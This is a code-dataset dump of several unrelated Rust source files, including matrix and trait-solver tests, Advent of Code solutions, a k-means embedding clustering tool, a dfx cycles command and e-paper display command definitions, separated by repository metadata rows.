assert_approx_eq!(m3[1].y, 0.0, EPSILON);
assert_approx_eq!(m3[1].z, -5.0, EPSILON);
assert_approx_eq!(m3[2].x, -6.0, EPSILON);
assert_approx_eq!(m3[2].y, 5.0, EPSILON);
assert_approx_eq!(m3[2].z, 0.0, EPSILON);
let transformed = m3 * test_vec3f_2();
let cross_product = v3.cross(test_vec3f_2());
assert_approx_eq!(transformed.x, cross_product.x, EPSILON);
assert_approx_eq!(transformed.y, cross_product.y, EPSILON);
assert_approx_eq!(transformed.z, cross_product.z, EPSILON);
}
#[test]
fn can_create_tensor_matrix () {
let v3_1 = test_vec3f_1();
let v3_2 = test_vec3f_2();
let tensor = Mat3::<f32>::tensor(&v3_1, &v3_2);
assert_approx_eq!(tensor[0].x, v3_1.x * v3_2.x, EPSILON);
assert_approx_eq!(tensor[0].y, v3_1.x * v3_2.y, EPSILON);
assert_approx_eq!(tensor[0].z, v3_1.x * v3_2.z, EPSILON);
assert_approx_eq!(tensor[1].x, v3_1.y * v3_2.x, EPSILON);
assert_approx_eq!(tensor[1].y, v3_1.y * v3_2.y, EPSILON);
assert_approx_eq!(tensor[1].z, v3_1.y * v3_2.z, EPSILON);
assert_approx_eq!(tensor[2].x, v3_1.z * v3_2.x, EPSILON);
assert_approx_eq!(tensor[2].y, v3_1.z * v3_2.y, EPSILON);
assert_approx_eq!(tensor[2].z, v3_1.z * v3_2.z, EPSILON);
}
#[test]
fn can_transpose_matrix () {
let mut m4 = test_mat4_1();
let mut m3 = test_mat3_1();
let transposed4 = m4.transposed();
let transposed3 = m3.transposed();
assert_eq!(transposed4[0].x, m4[0].x);
assert_eq!(transposed4[0].y, m4[1].x);
assert_eq!(transposed4[0].z, m4[2].x);
assert_eq!(transposed4[0].w, m4[3].x);
assert_eq!(transposed4[1].x, m4[0].y);
assert_eq!(transposed4[1].y, m4[1].y);
assert_eq!(transposed4[1].z, m4[2].y);
assert_eq!(transposed4[1].w, m4[3].y);
assert_eq!(transposed4[2].x, m4[0].z);
assert_eq!(transposed4[2].y, m4[1].z);
assert_eq!(transposed4[2].z, m4[2].z);
assert_eq!(transposed4[2].w, m4[3].z);
assert_eq!(transposed4[3].x, m4[0].w);
assert_eq!(transposed4[3].y, m4[1].w);
assert_eq!(transposed4[3].z, m4[2].w);
assert_eq!(transposed4[3].w, m4[3].w);
assert_eq!(transposed3[0].x, m3[0].x);
assert_eq!(transposed3[0].y, m3[1].x);
assert_eq!(transposed3[0].z, m3[2].x);
assert_eq!(transposed3[1].x, m3[0].y);
assert_eq!(transposed3[1].y, m3[1].y);
assert_eq!(transposed3[1].z, m3[2].y);
assert_eq!(transposed3[2].x, m3[0].z);
assert_eq!(transposed3[2].y, m3[1].z);
assert_eq!(transposed3[2].z, m3[2].z);
m4.transpose();
m3.transpose();
assert_eq!(transposed4[0].x, m4[0].x);
assert_eq!(transposed4[0].y, m4[0].y);
assert_eq!(transposed4[0].z, m4[0].z);
assert_eq!(transposed4[0].w, m4[0].w);
assert_eq!(transposed4[1].x, m4[1].x);
assert_eq!(transposed4[1].y, m4[1].y);
assert_eq!(transposed4[1].z, m4[1].z);
assert_eq!(transposed4[1].w, m4[1].w);
assert_eq!(transposed4[2].x, m4[2].x);
assert_eq!(transposed4[2].y, m4[2].y);
assert_eq!(transposed4[2].z, m4[2].z);
assert_eq!(transposed4[2].w, m4[2].w);
assert_eq!(transposed4[3].x, m4[3].x);
assert_eq!(transposed4[3].y, m4[3].y);
assert_eq!(transposed4[3].z, m4[3].z);
assert_eq!(transposed4[3].w, m4[3].w);
assert_eq!(transposed3[0].x, m3[0].x);
assert_eq!(transposed3[0].y, m3[0].y);
assert_eq!(transposed3[0].z, m3[0].z);
assert_eq!(transposed3[1].x, m3[1].x);
assert_eq!(transposed3[1].y, m3[1].y);
assert_eq!(transposed3[1].z, m3[1].z);
assert_eq!(transposed3[2].x, m3[2].x);
assert_eq!(transposed3[2].y, m3[2].y);
assert_eq!(transposed3[2].z, m3[2].z);
}
#[test]
fn can_create_rotation_matrix () {
let axis = test_vec3f_1().normalized();
let v4 = Vec4 {x: axis.y, y: -axis.x, z: 0f32, w: 1f32} * test_vec4f().length();
let m4 = Mat4::<f32>::rotate(&axis, 45.0);
assert_approx_eq!(m4[0].x, 0.825, EPSILON);
assert_approx_eq!(m4[0].y, 0.052, EPSILON);
assert_approx_eq!(m4[0].z, 0.562, EPSILON);
assert_approx_eq!(m4[0].w, 0.000, EPSILON);
assert_approx_eq!(m4[1].x, 0.232, EPSILON);
assert_approx_eq!(m4[1].y, 0.877, EPSILON);
assert_approx_eq!(m4[1].z, -0.421, EPSILON);
assert_approx_eq!(m4[1].w, 0.000, EPSILON);
assert_approx_eq!(m4[2].x, -0.515, EPSILON);
assert_approx_eq!(m4[2].y, 0.477, EPSILON);
assert_approx_eq!(m4[2].z, 0.712, EPSILON);
assert_approx_eq!(m4[2].w, 0.000, EPSILON);
assert_approx_eq!(m4[3].x, 0.000, EPSILON);
assert_approx_eq!(m4[3].y, 0.000, EPSILON);
assert_approx_eq!(m4[3].z, 0.000, EPSILON);
assert_approx_eq!(m4[3].w, 1.000, EPSILON);
let rotated = m4 * v4;
assert_approx_eq!(v4.length(), rotated.length(), EPSILON);
let v4_trimmed = Vec3 {x: v4.x, y: v4.y, z: v4.z };
let rot_trimmed = Vec3 {x: rotated.x, y: rotated.y, z: rotated.z};
assert_approx_eq!(v4_trimmed.angle(rot_trimmed), 45.0, EPSILON);
}
// fn test_mat4_1() -> Mat4<i32> {
// Mat4{values: [Vec4{x: 1, y: 2, z: 3, w: 4 },
// Vec4{x: 5, y: 6, z: 7, w: 8 },
// Vec4{x: 9, y: 10, z: 11, w: 12},
// Vec4{x: 13, y: 14, z: 15, w: 16}]}
// }
//
// fn test_mat4_2() -> Mat4<i32> {
// Mat4{values: [Vec4{x: 17, y: 18, z: 19, w: 20},
// Vec4{x: 21, y: 22, z: 23, w: 24},
// Vec4{x: 25, y: 26, z: 27, w: 28},
// Vec4{x: 29, y: 30, z: 31, w: 32}]}
// }
}
| true |
36a33115f933c37278d64c4161b64469e646257b
|
Rust
|
rust-lang/chalk
|
/tests/test/discriminant_kind.rs
|
UTF-8
| 4,404 | 2.921875 | 3 |
[
"Apache-2.0",
"BSD-3-Clause",
"bzip2-1.0.6",
"LicenseRef-scancode-other-permissive",
"NCSA",
"MIT",
"ISC",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"Unlicense"
] |
permissive
|
use super::*;
// Test that user-provided impls of `Discriminantkind` are prohibited
#[test]
fn no_discriminant_kind_impls() {
lowering_error! {
program {
#[lang(discriminant_kind)]
trait DiscriminantKind {
type Discriminant;
}
impl DiscriminantKind for u32 {
type Discriminant = u32;
}
} error_msg {
"trait impl for `DiscriminantKind` does not meet well-formedness requirements"
}
}
}
// Test that all types are implementing DiscriminantKind
#[test]
fn discriminant_kind_impl() {
test! {
program {
#[lang(discriminant_kind)]
trait DiscriminantKind {
type Discriminant;
}
#[object_safe]
trait Principal {}
struct A { }
}
goal {
A: DiscriminantKind
} yields {
expect![["Unique"]]
}
goal {
i32: DiscriminantKind
} yields {
expect![["Unique"]]
}
goal {
(i32, A): DiscriminantKind
} yields {
expect![["Unique"]]
}
goal {
forall<'a> {
dyn Principal + 'a: DiscriminantKind
}
} yields {
expect![["Unique"]]
}
}
}
#[test]
fn discriminant_kind_assoc() {
test! {
program {
#[lang(discriminant_kind)]
trait DiscriminantKind {
type Discriminant;
}
#[object_safe]
trait Principal {}
enum A { }
#[repr(isize)]
enum B { }
#[repr(i32)]
enum C {}
#[repr(u32)]
enum D {}
#[repr(usize)]
enum E {}
generator empty_gen<>[resume = (), yield = ()] {
upvars []
witnesses []
}
}
// Discriminant for types with no discriminant should be u8
goal {
Normalize(<u32 as DiscriminantKind>::Discriminant -> u8)
} yields {
expect![["Unique"]]
}
// Same as above
goal {
forall<'a> {
Normalize(<dyn Principal + 'a as DiscriminantKind>::Discriminant -> u8)
}
} yields {
expect![["Unique"]]
}
// Discriminant for enums with unspecified discriminant should be isize
goal {
Normalize(<A as DiscriminantKind>::Discriminant -> isize)
} yields {
expect![["Unique"]]
}
// Discriminant should be the same as specified in `repr`
// -----
goal {
Normalize(<B as DiscriminantKind>::Discriminant -> isize)
} yields {
expect![["Unique"]]
}
goal {
Normalize(<C as DiscriminantKind>::Discriminant -> i32)
} yields {
expect![["Unique"]]
}
goal {
Normalize(<D as DiscriminantKind>::Discriminant -> u32)
} yields {
expect![["Unique"]]
}
goal {
Normalize(<E as DiscriminantKind>::Discriminant -> usize)
} yields {
expect![["Unique"]]
}
//--------
// Generators have u32 as the discriminant
goal {
Normalize(<empty_gen as DiscriminantKind>::Discriminant -> u32)
} yields {
expect![["Unique"]]
}
// Placeholders don't have a determined discriminant
goal {
forall<T> {
exists<U> {
<T as DiscriminantKind>::Discriminant = U
}
}
} yields {
expect![["Unique; substitution [?0 := (DiscriminantKind::Discriminant)<!1_0>]"]]
}
}
}
#[test]
fn discriminant_kind_with_infer_var() {
test! {
program {
#[lang(discriminant_kind)]
trait DiscriminantKind {
type Discriminant;
}
enum Option<T> {}
}
goal {
exists<T> {
Normalize(<Option<T> as DiscriminantKind>::Discriminant -> isize)
}
} yields {
expect![[r#"Unique; for<?U0> { substitution [?0 := ^0.0] }"#]]
}
}
}
| true |
07e9e7410aa4e2c3c9b4bb009ea8c6f842287963
|
Rust
|
oro13/rust-algos-practice
|
/sorting/src/b_rand.rs
|
UTF-8
| 974 | 3.390625 | 3 |
[] |
no_license
|
// generate random numbers by storing a large number in curr,
// multiplying by another lager number
// incrementing that new number
// and then taking the modulo, so it remains with a given range
// mul inc should be less than the modulo, to save computation
// they should be prime, to slow frequency of repeated numbers
use lazy_static;
use std::sync::Mutex;
lazy_static::lazy_static! {
static ref RG: Mutex<RandGen> = Mutex::new(RandGen::new(34052));
}
pub fn rand(max: usize) -> usize {
RG.lock().unwrap().next_val(max)
}
pub struct RandGen {
curr: usize,
mul: usize,
inc: usize,
modulo: usize,
}
impl RandGen {
pub fn new(curr: usize) -> Self {
RandGen {
curr,
mul: 4259461,
inc: 7060771,
modulo: 81935240129,
}
}
pub fn next_val(&mut self, max: usize) -> usize {
self.curr = (self.curr * self.mul + self.inc) % self.modulo;
self.curr % max
}
}
| true |
304cc565e5c64f9d8a87626144a8460443553dcc
|
Rust
|
MichaelAquilina/adventofcode2017
|
/day1/src/main.rs
|
UTF-8
| 1,880 | 3.546875 | 4 |
[] |
no_license
|
extern crate clap;
use clap::{Arg, App};
use std::fs::File;
use std::io::prelude::*;
fn main() {
let matches = App::new("Advent of Code 2017 - Day 1")
.arg(Arg::with_name("filename")
.required(true))
.arg(Arg::with_name("part")
.possible_values(&["1", "2"]))
.get_matches();
let filename = matches.value_of("filename").unwrap();
let part = matches.value_of("part").unwrap_or("1");
let mut file = File::open(filename).unwrap();
let mut contents = String::new();
file.read_to_string(&mut contents).unwrap();
contents = contents.trim().to_string();
let skip: usize = match part {
"1" => 1,
_ => contents.len() / 2,
};
let result = solve(&contents, skip);
println!("{}", result);
}
fn solve(contents: &str, skip: usize) -> u32 {
let length = contents.len();
let mut total: u32 = 0;
let mut index: usize = 0;
while index < length {
let next = (index + skip) % length;
let v1 = contents.chars().nth(index).unwrap();
let v2 = contents.chars().nth(next).unwrap();
if v1 == v2 {
total += v1.to_digit(10).expect("Not a digit!");
}
index += 1;
}
return total;
}
#[cfg(test)]
mod test {
use super::*;
#[test]
fn test_part1() {
assert_eq!(solve("1122", 1), 3);
assert_eq!(solve("1111", 1), 4);
assert_eq!(solve("22", 1), 4);
assert_eq!(solve("", 1), 0);
assert_eq!(solve("1234", 1), 0);
assert_eq!(solve("91212129", 1), 9);
}
#[test]
fn test_part2() {
assert_eq!(solve("", 0), 0);
assert_eq!(solve("1212", 2), 6);
assert_eq!(solve("1221", 2), 0);
assert_eq!(solve("123425", 3), 4);
assert_eq!(solve("123123", 3), 12);
assert_eq!(solve("12131415", 4), 4);
}
}
| true |
b270488720b475a0c171d09e44c018dd8810f694
|
Rust
|
ardwalker/learn-rust
|
/src/rc.rs
|
UTF-8
| 312 | 3.46875 | 3 |
[] |
no_license
|
#[cfg(test)]
mod tests {
use std::rc::Rc;
use std::ops::Mul;
#[test]
fn simple_rc() {
let five = Rc::new(5);
assert_eq!(five.mul(5), 25);
}
#[test]
fn rc_pin() {
let _five = Rc::new("hello");
// five.
// assert_eq!(five.pin(), 25);
}
}
| true |
73d439d2cca0e96cad13efe947d878079c0075bf
|
Rust
|
ysmiraak/ir-homework
|
/kmeans/src/bin/kmeans.rs
|
UTF-8
| 2,947 | 2.6875 | 3 |
[
"MIT"
] |
permissive
|
// Author: Kuan Yu, 3913893
// Honor Code: I pledge that this program represents my own work.
extern crate kmeans;
extern crate getopts;
extern crate rust2vec;
use getopts::Options;
use std::fs::File;
use std::path::Path;
use std::env::args;
use std::process::exit;
use std::io::{BufReader, BufWriter, Write};
use rust2vec::{Embeddings, ReadWord2Vec};
use kmeans::{kmeans, step_sample, arg_max};
fn main() {
let (path_in, path_out, opt_k, epsilon, max_iter, verbose) = {
let mut opts = Options::new();
opts.reqopt("i", "input", "the binary embeddings file.", "")
.optopt("o", "output", "the output tsv file; default: `word_cluster.tsv`.", "")
.optopt("k", "centers", "the number of clusters; default: `sqrt(|data|)`.", "")
.optopt("e", "epsilon", "tolerance for convergence; default: `0.05`.", "")
.optopt("m", "max-iter", "the maximum number of iterations; default: `25`.", "")
.optopt("v", "verbose", "`false` or `true` by default.", "");
let matches = match opts.parse(args().skip(1)) {
Err(e) => {
println!("{}", opts.usage(&e.to_string()));
exit(1)
}
Ok(m) => m,
};
(matches.opt_str("i").unwrap(),
matches.opt_str("o").unwrap_or("word_cluster.tsv".to_owned()),
matches.opt_str("k").unwrap_or_default().parse::<usize>().ok(),
matches.opt_str("e").unwrap_or_default().parse::<f32>().unwrap_or(0.05),
matches.opt_str("m").unwrap_or_default().parse::<usize>().unwrap_or(25),
matches.opt_str("v").unwrap_or_default().parse::<bool>().unwrap_or(true))
};
if verbose { println!("loading embeddings ...");}
let embeddings = {
let mut emb = Embeddings::read_word2vec_binary(&mut BufReader::new(open_file(&path_in)))
.unwrap();
emb.normalize();
emb
};
let centroids = {
let data = embeddings.data();
let k = opt_k.unwrap_or(f32::sqrt(data.rows() as f32) as usize);
if verbose { println!("number of clusters:\t{}", k);}
kmeans(&data, step_sample(&data, k), epsilon, max_iter, verbose)
};
let mut wtr = BufWriter::new(create_file(&path_out));
if verbose { println!("writing to {} ...", path_out);}
for (word, embedding) in embeddings.iter() {
writeln!(wtr, "{}\t{}", word, arg_max(¢roids.dot(&embedding))).unwrap();
}
}
pub fn open_file<P>(path: P) -> File
where P: AsRef<Path>
{
match File::open(&path) {
Err(_) => {
println!("cannot open file: {:?}", path.as_ref());
exit(1)
}
Ok(file) => file,
}
}
pub fn create_file<P>(path: P) -> File
where P: AsRef<Path>
{
match File::create(&path) {
Err(_) => {
println!("cannot create file: {:?}", path.as_ref());
exit(1)
}
Ok(file) => file,
}
}
| true |
d237eee3b04da4e239274a70bfebb854f5b5e430
|
Rust
|
makadaw/advent-of-code-2020
|
/src/day22.rs
|
UTF-8
| 2,462 | 3.25 | 3 |
[
"MIT"
] |
permissive
|
use std::collections::HashSet;
type Deck = Vec<usize>;
#[aoc_generator(day22)]
pub fn input_generator(input: &str) -> (Deck, Deck) {
let decks: Vec<Deck> = input
.split("\n\n")
.map(|d| d.lines().skip(1).flat_map(str::parse::<usize>).collect())
.collect();
(decks[0].to_vec(), decks[1].to_vec())
}
fn game(deck1: &mut Vec<usize>, deck2: &mut Vec<usize>, with_recursive: bool) -> usize {
let mut infinite = false;
let mut mem: HashSet<Vec<usize>> = HashSet::new();
while !deck1.is_empty() && !deck2.is_empty() {
if with_recursive && mem.contains(&deck1.to_vec()) || mem.contains(&deck2.to_vec()) {
infinite = true;
break;
}
if with_recursive {
mem.insert(deck1.to_vec());
mem.insert(deck2.to_vec());
}
match (deck1.remove(0), deck2.remove(0)) {
(a, b) if with_recursive && deck1.len() >= a && deck2.len() >= b => {
// Rec game
if game(
&mut deck1[..a].to_vec(),
&mut deck2[..b].to_vec(),
with_recursive,
) == 1
{
deck1.push(a);
deck1.push(b);
} else {
deck2.push(b);
deck2.push(a);
}
}
(a, b) if a > b => {
deck1.push(a);
deck1.push(b);
}
(a, b) if a < b => {
deck2.push(b);
deck2.push(a);
}
_ => {}
}
}
if infinite || deck2.is_empty() {
1
} else {
2
}
}
#[aoc(day22, part1)]
pub fn solve_part1(input: &(Deck, Deck)) -> usize {
let (mut deck1, mut deck2) = input.clone();
let winner = if game(&mut deck1, &mut deck2, false) == 1 {
deck1
} else {
deck2
};
println!("{:?}", winner);
winner
.iter()
.enumerate()
.map(|(i, v)| v * (winner.len() - i))
.sum()
}
#[aoc(day22, part2)]
pub fn solve_part2(input: &(Deck, Deck)) -> usize {
let (mut deck1, mut deck2) = input.clone();
let winner = if game(&mut deck1, &mut deck2, true) == 1 {
deck1
} else {
deck2
};
println!("{:?}", winner);
winner
.iter()
.enumerate()
.map(|(i, v)| v * (winner.len() - i))
.sum()
}
| true |
10419ff81fa91529b9cc7565a26cc3e9e61cf9b0
|
Rust
|
Hsiaopan/rust_learning
|
/algo-heapsort/src/main.rs
|
UTF-8
| 1,057 | 3.6875 | 4 |
[] |
no_license
|
pub fn heapsort(arr: &mut [i32]) -> &mut [i32] {
// -- Heapify part --
// This procedure would build a valid max-heap.
// (or min-heap for sorting descendantly)
let end = arr.len();
for start in (0..end / 2).rev() {
sift_down(arr, start, end - 1);
}
// -- Sorting part --
// Iteratively sift down unsorted part (the heap).
for end in (1..arr.len()).rev() {
arr.swap(end, 0);
sift_down(arr, 0, end - 1);
}
arr
}
fn sift_down(arr: &mut [i32], start: usize, end: usize) {
let mut root = start;
loop {
let mut child = root * 2 + 1;
if child > end {
break;
}
if child + 1 <= end && arr[child] < arr[child + 1] {
child += 1;
}
if arr[root] < arr[child] {
arr.swap(root, child);
root = child;
} else {
break;
}
}
}
fn main() {
let mut vec1 = [1, 5, 7, 3, 9, 11, 2, 3, 6, 12, 8];
println!("{:?}", vec1);
println!("{:?}", heapsort(&mut vec1));
}
| true |
5ede057063e2056556736a76f372bbba2b55d46e
|
Rust
|
udoprog/sysmon-rs
|
/src/config.rs
|
UTF-8
| 6,057 | 2.578125 | 3 |
[
"Apache-2.0"
] |
permissive
|
use serde;
use plugin::*;
use errors::*;
use std::sync::Arc;
use std::cell::RefCell;
use std::rc::Rc;
use std::fs;
use std::io::Read;
use toml;
use num_cpus;
use futures_cpupool::*;
use tokio_core;
use std::time::Duration;
pub struct Config {
/// Number of threads to configure in thread pool.
threads: usize,
/// If the threads option is per cpu or not.
threads_per_cpu: bool,
/// Interval at which to perform updates.
pub update_interval: Duration,
/// Interval at which to perform polling.
pub poll_interval: Duration,
}
/// Model used to parse configuration file.
/// Same as Config, but with optional fields to allow leaving them unspecified.
#[derive(Deserialize, Debug)]
pub struct ConfigIn {
threads: Option<usize>,
threads_per_cpu: Option<bool>,
update_interval: Option<Duration>,
poll_interval: Option<Duration>,
}
pub struct PartialPluginContext {
cpupool: Arc<CpuPool>,
core: Rc<RefCell<tokio_core::reactor::Core>>,
}
impl PartialPluginContext {
pub fn new(
cpupool: Arc<CpuPool>,
core: Rc<RefCell<tokio_core::reactor::Core>>,
) -> PartialPluginContext {
PartialPluginContext {
cpupool: cpupool,
core: core,
}
}
fn build<'a>(&self, id: &'a String, config: &'a toml::Table) -> PluginContext<'a> {
PluginContext {
id: id,
config: config,
cpupool: self.cpupool.clone(),
core: self.core.clone(),
}
}
}
pub type PluginSetup = Fn(&Config, &PluginRegistry, &PartialPluginContext)
-> Result<(Vec<Arc<Box<InputInstance>>>, Vec<Box<OutputInstance>>)>;
impl Config {
pub fn new() -> Config {
// defaults
Config {
threads: 4,
threads_per_cpu: false,
update_interval: Duration::new(1, 0),
poll_interval: Duration::new(10, 0),
}
}
pub fn threads(&self) -> usize {
if self.threads_per_cpu {
return num_cpus::get() * self.threads;
}
self.threads
}
}
fn load_instance<Entry, Instance, Load, Plugin, Setup>(
id: &String,
plugin_section: toml::Value,
load: Load,
setup: Setup,
) -> Result<Instance>
where
Entry: Fn() -> Result<Plugin>,
Load: Fn(&String) -> Option<Entry>,
Setup: Fn(Plugin, &String, &toml::Table) -> Result<Instance>,
{
let plugin_table: toml::Table = toml::decode(plugin_section).ok_or(ErrorKind::TomlDecode)?;
let plugin_type: String = plugin_table
.get("type")
.map(Clone::clone)
.and_then(toml::decode)
.ok_or(ErrorKind::MissingField("type".to_owned()))?;
let entry = load(&plugin_type).ok_or(
ErrorKind::MissingPlugin(plugin_type),
)?;
let plugin = entry()?;
setup(plugin, id, &plugin_table)
}
fn load_section<Entry, Instance, Load, Plugin, Setup>(
section: &toml::Value,
load: Load,
setup: Setup,
) -> Result<Vec<Instance>>
where
Entry: Fn() -> Result<Plugin>,
Load: Fn(&String) -> Option<Entry>,
Setup: Fn(Plugin, &String, &toml::Table) -> Result<Instance>,
{
let mut values: Vec<Instance> = Vec::new();
let table: toml::Table = toml::decode(section.clone()).ok_or(ErrorKind::TomlDecode)?;
for (id, plugin_section) in table {
values.push(load_instance(&id, plugin_section.clone(), &load, &setup)
.chain_err(|| ErrorKind::ConfigSection(id))?);
}
Ok(values)
}
/// Read optional fields from input configuration.
macro_rules! read_config {
( $config:ident, $config_in:ident, [$($field:ident),*] ) => {
$(
if let Some($field) = $config_in.$field {
$config.$field = $field;
}
)*
};
}
pub fn load_config(config: &mut Config, path: &String) -> Result<Box<PluginSetup>> {
let mut file = fs::File::open(path)?;
let mut content = String::new();
file.read_to_string(&mut content)?;
let mut parser = toml::Parser::new(&mut content);
let root = match parser.parse() {
Some(value) => value,
None => return Err(ErrorKind::TomlParse(parser.errors).into()),
};
let config_in: ConfigIn = {
let mut decoder = toml::Decoder::new(toml::Value::Table(root.clone()));
serde::Deserialize::deserialize(&mut decoder)
}?;
if let Some(threads) = config_in.threads {
if threads <= 0 {
return Err(
ErrorKind::ConfigField(
"threads".to_owned(),
"must be a positive number".to_owned(),
).into(),
);
}
config.threads = threads;
}
read_config!(
config,
config_in,
[threads_per_cpu, update_interval, poll_interval]
);
let mut input_configs = Vec::new();
let mut output_configs = Vec::new();
if let Some(i) = root.get("in") {
input_configs.push(i.clone());
}
if let Some(o) = root.get("out") {
output_configs.push(o.clone());
}
Ok(Box::new(move |_config, plugins, partial_context| {
let mut inputs: Vec<Arc<Box<InputInstance>>> = Vec::new();
let mut outputs: Vec<Box<OutputInstance>> = Vec::new();
for i in input_configs.iter() {
let loaded = load_section(&i, |plugin_type| plugins.get_input(plugin_type), |plugin,
id,
config| {
plugin.setup(partial_context.build(id, config)).map(
Arc::new,
)
}).chain_err(|| ErrorKind::ConfigSection("in".to_owned()))?;
inputs.extend(loaded);
}
for o in output_configs.iter() {
let loaded = load_section(&o, |plugin_type| plugins.get_output(plugin_type), |plugin,
id,
config| {
plugin.setup(partial_context.build(id, config))
}).chain_err(|| ErrorKind::ConfigSection("out".to_owned()))?;
outputs.extend(loaded);
}
Ok((inputs, outputs))
}))
}
| true |
b3a8e539b7ad2cd5f33f62cb33918990e54c1629
|
Rust
|
jplevyak/sdk
|
/src/dfx/src/commands/canister/deposit_cycles.rs
|
UTF-8
| 2,803 | 2.59375 | 3 |
[
"Apache-2.0"
] |
permissive
|
use crate::lib::environment::Environment;
use crate::lib::error::DfxResult;
use crate::lib::identity::identity_utils::CallSender;
use crate::lib::models::canister_id_store::CanisterIdStore;
use crate::lib::operations::canister;
use crate::lib::root_key::fetch_root_key_if_needed;
use crate::util::clap::validators::cycle_amount_validator;
use crate::util::expiry_duration;
use anyhow::bail;
use clap::Clap;
use ic_types::Principal;
use slog::info;
use std::time::Duration;
/// Deposit cycles into the specified canister.
#[derive(Clap)]
pub struct DepositCyclesOpts {
/// Specifies the amount of cycles to send on the call.
/// Deducted from the wallet.
#[clap(validator(cycle_amount_validator))]
cycles: String,
/// Specifies the name or id of the canister to receive the cycles deposit.
/// You must specify either a canister name/id or the --all option.
canister: Option<String>,
/// Deposit cycles to all of the canisters configured in the dfx.json file.
#[clap(long, required_unless_present("canister"))]
all: bool,
}
async fn deposit_cycles(
env: &dyn Environment,
canister: &str,
timeout: Duration,
call_sender: &CallSender,
cycles: u64,
) -> DfxResult {
let log = env.get_logger();
let canister_id_store = CanisterIdStore::for_env(env)?;
let canister_id =
Principal::from_text(canister).or_else(|_| canister_id_store.get(canister))?;
info!(log, "Depositing {} cycles onto {}", cycles, canister,);
canister::deposit_cycles(env, canister_id.clone(), timeout, call_sender, cycles).await?;
let status = canister::get_canister_status(env, canister_id, timeout, call_sender).await?;
info!(
log,
"Deposited {} cycles, updated balance: {} cycles", cycles, status.cycles
);
Ok(())
}
pub async fn exec(
env: &dyn Environment,
opts: DepositCyclesOpts,
call_sender: &CallSender,
) -> DfxResult {
if call_sender == &CallSender::SelectedId {
bail!("The deposit cycles call needs to proxied via the wallet canister. Invoke this command without the `--no-wallet` flag.");
}
// amount has been validated by cycle_amount_validator
let cycles = opts.cycles.parse::<u64>().unwrap();
let config = env.get_config_or_anyhow()?;
fetch_root_key_if_needed(env).await?;
let timeout = expiry_duration();
if let Some(canister) = opts.canister.as_deref() {
deposit_cycles(env, &canister, timeout, call_sender, cycles).await
} else if opts.all {
if let Some(canisters) = &config.get_config().canisters {
for canister in canisters.keys() {
deposit_cycles(env, &canister, timeout, call_sender, cycles).await?;
}
}
Ok(())
} else {
unreachable!()
}
}
| true |
4b2ba0eba187bfd7315a4b0e2aaf0468efe797b8
|
Rust
|
ZhongliGao/memtable-rs
|
/memtable-core/src/capacity.rs
|
UTF-8
| 848 | 3.515625 | 4 |
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"Apache-2.0"
] |
permissive
|
/// Represents the capacity of the list
#[derive(Copy, Clone, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)]
#[cfg_attr(feature = "serde-1", derive(serde::Serialize, serde::Deserialize))]
pub enum Capacity {
/// Represents a capacity that has a maximum bounds
Limited(usize),
/// Represents a capacity with no bounds
Unlimited,
}
impl Capacity {
/// Returns true if the capacity is unlimited
pub fn is_unlimited(self) -> bool {
matches!(self, Self::Unlimited)
}
/// Returns true if the capacity is limited
pub fn is_limited(self) -> bool {
matches!(self, Self::Limited(_))
}
/// Returns the limit associated with the capacity if it has one
pub fn limit(self) -> Option<usize> {
match self {
Self::Limited(x) => Some(x),
_ => None,
}
}
}
| true |
b945ff90cc63c7aacba870ed588cc940e39ec1df
|
Rust
|
caemor/epd-waveshare
|
/src/epd2in13_v2/command.rs
|
UTF-8
| 6,872 | 2.796875 | 3 |
[
"ISC"
] |
permissive
|
//! SPI Commands for the Waveshare 2.13" v2
use crate::traits;
extern crate bit_field;
use bit_field::BitField;
/// Epd2in13 v2
///
/// For more infos about the addresses and what they are doing look into the pdfs
#[allow(dead_code)]
#[derive(Copy, Clone)]
pub(crate) enum Command {
DriverOutputControl = 0x01,
GateDrivingVoltageCtrl = 0x03,
SourceDrivingVoltageCtrl = 0x04,
BoosterSoftStartControl = 0x0C,
GateScanStartPosition = 0x0F,
DeepSleepMode = 0x10,
DataEntryModeSetting = 0x11,
SwReset = 0x12,
HvReadyDetection = 0x14,
VciDetection = 0x15,
TemperatureSensorControlWrite = 0x1A,
TemperatureSensorControlRead = 0x1B,
TemperatureSensorExtControlWrite = 0x1C,
MasterActivation = 0x20,
DisplayUpdateControl1 = 0x21,
DisplayUpdateControl2 = 0x22,
WriteRam = 0x24,
WriteRamRed = 0x26,
ReadRam = 0x27,
VcomSense = 0x28,
VcomSenseDuration = 0x29,
ProgramVcomOpt = 0x2A,
WriteVcomRegister = 0x2C,
OtpRegisterRead = 0x2D,
StatusBitRead = 0x2F,
ProgramWsOtp = 0x30,
LoadWsOtp = 0x31,
WriteLutRegister = 0x32,
ProgramOtpSelection = 0x36,
WriteOtpSelection = 0x37,
SetDummyLinePeriod = 0x3A,
SetGateLineWidth = 0x3B,
BorderWaveformControl = 0x3C,
ReadRamOption = 0x41,
SetRamXAddressStartEndPosition = 0x44,
SetRamYAddressStartEndPosition = 0x45,
AutoWriteRedRamRegularPattern = 0x46,
AutoWriteBwRamRegularPattern = 0x47,
SetRamXAddressCounter = 0x4E,
SetRamYAddressCounter = 0x4F,
SetAnalogBlockControl = 0x74,
SetDigitalBlockControl = 0x7E,
Nop = 0x7F,
}
pub(crate) struct DriverOutput {
pub scan_is_linear: bool,
pub scan_g0_is_first: bool,
pub scan_dir_incr: bool,
pub width: u16,
}
impl DriverOutput {
pub fn to_bytes(&self) -> [u8; 3] {
[
self.width as u8,
(self.width >> 8) as u8,
*0u8.set_bit(0, !self.scan_dir_incr)
.set_bit(1, !self.scan_g0_is_first)
.set_bit(2, !self.scan_is_linear),
]
}
}
/// These are not directly documented, but the bitfield is easily reversed from
/// documentation and sample code
/// [7|6|5|4|3|2|1|0]
/// | | | | | | | `--- disable clock
/// | | | | | | `----- disable analog
/// | | | | | `------- display
/// | | | | `--------- undocumented and unknown use,
/// | | | | but used in waveshare reference code
/// | | | `----------- load LUT
/// | | `------------- load temp
/// | `--------------- enable clock
/// `----------------- enable analog
pub(crate) struct DisplayUpdateControl2(pub u8);
#[allow(dead_code)]
impl DisplayUpdateControl2 {
pub fn new() -> DisplayUpdateControl2 {
DisplayUpdateControl2(0x00)
}
pub fn disable_clock(mut self) -> Self {
self.0.set_bit(0, true);
self
}
pub fn disable_analog(mut self) -> Self {
self.0.set_bit(1, true);
self
}
pub fn display(mut self) -> Self {
self.0.set_bit(2, true);
self
}
